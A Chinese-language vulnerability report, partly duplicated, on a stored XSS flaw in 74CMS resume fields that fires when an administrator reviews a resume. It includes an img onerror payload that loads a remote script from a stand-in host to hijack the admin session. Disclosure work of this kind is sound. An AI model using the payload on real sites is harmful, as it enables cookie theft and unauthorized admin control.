### 简要描述: 74CMS对用户输入没有进行有效过滤,导致XSS漏洞存在。漏洞触发时,可拿到系统管理员COOKIE信息,修改后台设置,增加管理员等。 ### 详细说明: 1、74CMS人才系统对创建简历的各字段没有进行有效过滤,导致存储型XSS漏洞的存在,存在漏洞的字段包括户口所在地、技能特长、工作经历等等。 当系统管理员登陆后台,审核用户提交简历时,漏洞便会触发。利用此漏洞可以盗取管理员的cookie信息登陆后台、或者使用恶意脚本修改后台设置,例如:删除用户提交简历,增加新的管理员等等。 2、从官网:http://www.74cms.com/ 下载最新版源代码,在本地搭建环境进行测试。 ### 漏洞证明: 1、注册普通用户,在会员中心模块创建新简历,并在技能技能特长部分输入以下内容: [<img src="https://images.seebug.org/upload/201405/211424017d2722d5f25063868e54fe1c8b366e75.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/211424017d2722d5f25063868e54fe1c8b366e75.png) 2、简历创建完毕,系统管理员登陆后台,查看简历进行审核: [<img src="https://images.seebug.org/upload/201405/211424539f53f1798a8391e26c6738d432fbc764.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/211424539f53f1798a8391e26c6738d432fbc764.png) 3、打开简历,漏洞触发: [<img src="https://images.seebug.org/upload/201405/2114252944d4a1eb5045cdeebcd211571e4c603d.png" alt="3.png"...
### 简要描述: 74CMS对用户输入没有进行有效过滤,导致XSS漏洞存在。漏洞触发时,可拿到系统管理员COOKIE信息,修改后台设置,增加管理员等。 ### 详细说明: 1、74CMS人才系统对创建简历的各字段没有进行有效过滤,导致存储型XSS漏洞的存在,存在漏洞的字段包括户口所在地、技能特长、工作经历等等。 当系统管理员登陆后台,审核用户提交简历时,漏洞便会触发。利用此漏洞可以盗取管理员的cookie信息登陆后台、或者使用恶意脚本修改后台设置,例如:删除用户提交简历,增加新的管理员等等。 2、从官网:http://www.74cms.com/ 下载最新版源代码,在本地搭建环境进行测试。 ### 漏洞证明: 1、注册普通用户,在会员中心模块创建新简历,并在技能技能特长部分输入以下内容: [<img src="https://images.seebug.org/upload/201405/211424017d2722d5f25063868e54fe1c8b366e75.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/211424017d2722d5f25063868e54fe1c8b366e75.png) 2、简历创建完毕,系统管理员登陆后台,查看简历进行审核: [<img src="https://images.seebug.org/upload/201405/211424539f53f1798a8391e26c6738d432fbc764.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/211424539f53f1798a8391e26c6738d432fbc764.png) 3、打开简历,漏洞触发: [<img src="https://images.seebug.org/upload/201405/2114252944d4a1eb5045cdeebcd211571e4c603d.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/2114252944d4a1eb5045cdeebcd211571e4c603d.png) 4、使用Firebug查看源代码: [<img src="https://images.seebug.org/upload/201405/211426017b44cd58626941d2c6dcd84bd7e59e9b.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/211426017b44cd58626941d2c6dcd84bd7e59e9b.png) 5、修改插入的恶意标签为: <img src=x onerror=d=document;e=d.createElement('script');e.src='http://127.0.0.1/eXploit.js';d.body.appendChild(e);> 6、管理员审核简历,漏洞触发: [<img src="https://images.seebug.org/upload/201405/21143104e4816661d9ffc4532066a46c608bed97.png" alt="74.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/21143104e4816661d9ffc4532066a46c608bed97.png) 成功加载本地脚本,通过修改脚本代码,我们可以对系统后台进行恶意修改,例如:删除简历,增加管理员等等。